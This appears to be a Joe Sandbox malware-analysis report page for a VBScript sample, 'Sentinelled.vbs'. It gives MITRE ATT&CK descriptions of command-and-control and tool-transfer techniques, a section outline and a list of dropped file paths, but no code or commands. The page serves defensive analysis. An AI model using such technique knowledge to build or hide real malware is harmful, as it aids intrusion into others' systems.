Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Sentinelled.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Other

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cslfufb2.vxd.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_q1pd4hdj.u2l.ps1

C:\Users\user\AppData\Roaming\Unmidwifed.Sur

Static File Info

General

File Icon

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Windows Analysis Report
Sentinelled.vbs